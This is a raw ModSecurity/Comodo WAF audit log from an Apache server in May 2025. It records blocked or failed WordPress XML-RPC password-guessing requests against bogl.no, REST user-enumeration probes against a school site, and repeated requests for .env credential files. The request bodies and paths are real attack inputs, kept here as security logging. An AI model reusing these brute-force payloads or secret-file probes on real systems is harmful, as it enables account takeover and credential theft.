Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4eb90935-Z-- --55016a26-A-- [25/May/2025:14:59:22 +0700] aDLN2hEdxfhJOSxH8A8jJgAAAEU 103.236.140.4 36478 103.236.140.4 8181 --55016a26-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 142.93.31.43 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 142.93.31.43 X-Forwarded-Proto: https Connection: close Content-Length: 488 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --55016a26-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmifahmi!@#$%^&*() --55016a26-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --55016a26-E-- --55016a26-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||bogl.no|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "mod_suphp.c"] [line 790] [level 3] File does not exist: %s Stopwatch: 1748159962822460 6576 (- - -) Stopwatch2: 1748159962822460 6576; combined=4826, p1=434, p2=4166, p3=32, p4=35, p5=98, sr=71, sw=61, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --55016a26-Z-- --17d3571f-A-- [25/May/2025:15:03:23 +0700] aDLOy3P6UgzLD1l8HTootgAAAA4 103.236.140.4 38698 103.236.140.4 8181 --17d3571f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 162.214.156.104 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 162.214.156.104 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --17d3571f-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmi&fahmi& --17d3571f-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --17d3571f-E-- --17d3571f-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||bogl.no|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "mod_suphp.c"] [line 790] [level 3] File does not exist: %s Stopwatch: 1748160203567485 5367 (- - -) Stopwatch2: 1748160203567485 5367; combined=3827, p1=393, p2=3131, p3=82, p4=61, p5=97, sr=66, sw=63, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --17d3571f-Z-- --98799d4c-A-- [25/May/2025:15:32:45 +0700] aDLVrderygsLmB9N_YSQugAAAIo 103.236.140.4 54892 103.236.140.4 8181 --98799d4c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 190.124.39.50 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 190.124.39.50 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --98799d4c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --98799d4c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748161965334321 2801 (- - -) Stopwatch2: 1748161965334321 2801; combined=1252, p1=424, p2=800, p3=0, p4=0, p5=28, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --98799d4c-Z-- --f163c27c-A-- [25/May/2025:15:51:58 +0700] aDLaLhEdxfhJOSxH8A8svQAAAFQ 103.236.140.4 37328 103.236.140.4 8181 --f163c27c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 41.72.211.158 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 41.72.211.158 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f163c27c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f163c27c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748163118493077 2715 (- - -) Stopwatch2: 1748163118493077 2715; combined=1483, p1=509, p2=941, p3=0, p4=0, p5=33, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f163c27c-Z-- --92e6a371-A-- [25/May/2025:16:06:04 +0700] aDLdfBEdxfhJOSxH8A8vswAAAFQ 103.236.140.4 45142 103.236.140.4 8181 --92e6a371-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 31.56.56.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 31.56.56.153 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --92e6a371-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --92e6a371-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748163964493173 794 (- - -) Stopwatch2: 1748163964493173 794; combined=327, p1=290, p2=0, p3=0, p4=0, p5=37, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --92e6a371-Z-- --68ada334-A-- [25/May/2025:16:12:26 +0700] aDLe-nawJq5017Xs8D4bnAAAAMI 103.236.140.4 48650 103.236.140.4 8181 --68ada334-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 167.99.55.127 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 167.99.55.127 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5.2 Safari/605.1.15 --68ada334-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --68ada334-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748164346623566 1010 (- - -) Stopwatch2: 1748164346623566 1010; combined=401, p1=354, p2=0, p3=0, p4=0, p5=47, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68ada334-Z-- --b47ffc26-A-- [25/May/2025:16:12:27 +0700] aDLe-9erygsLmB9N_YSfrQAAAJE 103.236.140.4 48658 103.236.140.4 8181 --b47ffc26-B-- GET /.env.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 167.99.55.127 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 167.99.55.127 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5.2 Safari/605.1.15 --b47ffc26-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b47ffc26-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748164347165588 757 (- - -) Stopwatch2: 1748164347165588 757; combined=345, p1=311, p2=0, p3=0, p4=0, p5=34, sr=127, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b47ffc26-Z-- --5650d211-A-- [25/May/2025:16:37:23 +0700] aDLk03awJq5017Xs8D4jWQAAAMA 103.236.140.4 34246 103.236.140.4 8181 --5650d211-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.180 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.180 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --5650d211-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmiantix28 --5650d211-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5650d211-E-- --5650d211-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.180 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748165843019268 4853 (- - -) Stopwatch2: 1748165843019268 4853; combined=3409, p1=398, p2=2871, p3=0, p4=0, p5=82, sr=71, sw=58, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5650d211-Z-- --b7bbb95e-A-- [25/May/2025:16:40:07 +0700] aDLldxEdxfhJOSxH8A84JgAAAE4 103.236.140.4 35686 103.236.140.4 8181 --b7bbb95e-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.180 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.180 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --b7bbb95e-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmiantix2026 --b7bbb95e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b7bbb95e-E-- --b7bbb95e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.180 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748166007179427 5459 (- - -) Stopwatch2: 1748166007179427 5459; combined=3957, p1=461, p2=3325, p3=0, p4=0, p5=100, sr=87, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b7bbb95e-Z-- --a7c45259-A-- [25/May/2025:16:44:45 +0700] aDLmjXawJq5017Xs8D4lgAAAAMs 103.236.140.4 37112 103.236.140.4 8181 --a7c45259-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.180 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.180 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --a7c45259-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmiFahmi1234!@#$ --a7c45259-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a7c45259-E-- --a7c45259-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.180 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748166285496140 5572 (- - -) Stopwatch2: 1748166285496140 5572; combined=4105, p1=485, p2=3413, p3=0, p4=0, p5=133, sr=88, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a7c45259-Z-- --5634a148-A-- [25/May/2025:16:47:52 +0700] aDLnSHP6UgzLD1l8HTpBEgAAABA 103.236.140.4 37894 103.236.140.4 8181 --5634a148-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.180 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.180 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --5634a148-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmiFahmi2009! --5634a148-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5634a148-E-- --5634a148-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.180 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748166472989563 5186 (- - -) Stopwatch2: 1748166472989563 5186; combined=4069, p1=443, p2=3454, p3=0, p4=0, p5=101, sr=78, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5634a148-Z-- --66c67444-A-- [25/May/2025:16:59:13 +0700] aDLp8XP6UgzLD1l8HTpCBgAAAAQ 103.236.140.4 40756 103.236.140.4 8181 --66c67444-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 54.78.115.243 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 54.78.115.243 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --66c67444-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --66c67444-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748167153127566 2888 (- - -) Stopwatch2: 1748167153127566 2888; combined=1314, p1=429, p2=845, p3=0, p4=0, p5=40, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --66c67444-Z-- --6415bb61-A-- [25/May/2025:17:08:51 +0700] aDLsMxEdxfhJOSxH8A86nwAAAEw 103.236.140.4 42306 103.236.140.4 8181 --6415bb61-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 187.16.65.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 187.16.65.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6415bb61-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6415bb61-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748167731487572 2828 (- - -) Stopwatch2: 1748167731487572 2828; combined=1318, p1=418, p2=872, p3=0, p4=0, p5=28, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6415bb61-Z-- --19befe21-A-- [25/May/2025:18:43:29 +0700] aDMCYXawJq5017Xs8D4qdgAAAMU 103.236.140.4 45478 103.236.140.4 8181 --19befe21-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 74.48.172.186 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 74.48.172.186 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1 Accept: */* --19befe21-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --19befe21-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748173409758232 804 (- - -) Stopwatch2: 1748173409758232 804; combined=312, p1=274, p2=0, p3=0, p4=0, p5=37, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --19befe21-Z-- --70bd8d4e-A-- [25/May/2025:18:43:30 +0700] aDMCYnP6UgzLD1l8HTpDYgAAABI 103.236.140.4 45480 103.236.140.4 8181 --70bd8d4e-B-- GET /.env.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 74.48.172.186 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 74.48.172.186 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1 Accept: */* --70bd8d4e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --70bd8d4e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748173410136276 749 (- - -) Stopwatch2: 1748173410136276 749; combined=305, p1=264, p2=0, p3=0, p4=0, p5=40, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --70bd8d4e-Z-- --8928327b-A-- [25/May/2025:18:54:44 +0700] aDMFBBEdxfhJOSxH8A876QAAAEU 103.236.140.4 45966 103.236.140.4 8181 --8928327b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 42.116.10.197 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 42.116.10.197 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --8928327b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8928327b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748174084743938 2783 (- - -) Stopwatch2: 1748174084743938 2783; combined=1240, p1=434, p2=777, p3=0, p4=0, p5=29, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8928327b-Z-- --b4fa8d1f-A-- [25/May/2025:19:33:17 +0700] aDMODderygsLmB9N_YSrzQAAAIM 103.236.140.4 46226 103.236.140.4 8181 --b4fa8d1f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 204.48.23.212 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 204.48.23.212 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --b4fa8d1f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b4fa8d1f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748176397375030 915 (- - -) Stopwatch2: 1748176397375030 915; combined=387, p1=339, p2=0, p3=0, p4=0, p5=47, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
